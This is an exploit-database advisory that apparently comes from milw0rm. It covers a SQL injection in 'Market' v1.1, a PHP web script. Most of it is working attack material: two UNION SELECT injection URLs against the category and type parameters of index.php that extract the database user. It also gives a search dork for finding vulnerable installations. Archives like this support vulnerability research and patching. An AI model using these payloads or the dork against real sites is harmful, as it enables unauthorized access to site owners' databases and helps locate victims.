exploit-db-mirror/exploits/php/webapps/6297.txt

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz
Home Page: www.antichat.ru
Date found: 25.08.08
Product: Market
Version: 1.1
Download script: http://www.matterdaddy.com/4/scripts/market_v1_1.zip
Vulnerability Class: SQL Injection

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*

Dork:

made by matterdaddy

# milw0rm.com [2008-08-25]